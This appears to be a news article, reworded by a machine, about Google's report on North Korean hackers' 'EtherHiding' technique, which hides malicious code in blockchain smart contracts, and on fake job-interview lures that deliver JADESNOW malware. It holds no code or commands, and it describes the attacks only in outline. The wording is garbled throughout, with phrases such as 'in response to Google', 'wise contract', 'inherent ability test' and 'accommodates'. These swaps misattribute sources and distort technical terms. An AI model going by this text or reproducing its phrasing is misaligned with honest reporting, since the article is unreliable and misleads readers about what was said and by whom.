North Korean hackers have adopted a technique of deploying malware geared toward stealing cryptocurrencies and sensitive information by embedding malicious code into smart contracts on public blockchain networks, in response to Google's Threat Intelligence Group.
The technique, called “EtherHiding,” was introduced in 2023 and, in response to Google, is often used together with social engineering techniques, comparable to reaching victims with fake job offers and high-profile interviews and redirecting users to malicious web sites or links.
Hackers take control of a legitimate website address via a loader script and embed JavaScript code into the web site, triggering a separate package of malicious code in a wise contract designed to steal funds and data once the user interacts with the compromised website.
Simplified representation of how the “EtherHiding” hack works. Source: Google Cloud
The compromised website communicates with the blockchain network through a “read-only” feature that doesn’t actually create a transaction on the ledger, allowing threat actors to avoid detection and minimize transaction fees, in response to Google researchers.
The report highlights the necessity for vigilance within the crypto community to guard users from scams and hacks commonly utilized by threat actors in search of to steal funds and helpful information from individuals and organizations alike.
Know the Signs: North Korea's Social Engineering Campaign Decrypted
According to Google, the threat actors will arrange fake firms, recruiting agencies, and profiles to focus on software and cryptocurrency developers with fake job offers.
After the initial pitch, the attackers move communication to messaging platforms comparable to Discord or Telegram and instruct the victim to take an inherent ability test or complete a programming task.
“The core of the attack occurs during a technical assessment phase,” Google Threat Intelligence said. At this stage, the victim is often told to download malicious files from online code repositories comparable to GitHub, where the malicious payload is stored.
In other cases, the attackers lure the victim right into a video call during which the user is shown a fake error message asking them to download a patch to repair the error. This software patch also accommodates malicious code.
Once the malware is installed on a pc, a second-stage JavaScript-based malware called “JADESNOW” is deployed to steal sensitive data.
A 3rd tier is typically used for high-value targets and provides attackers long-term access to a compromised computer and other systems connected to its network, Google warned.
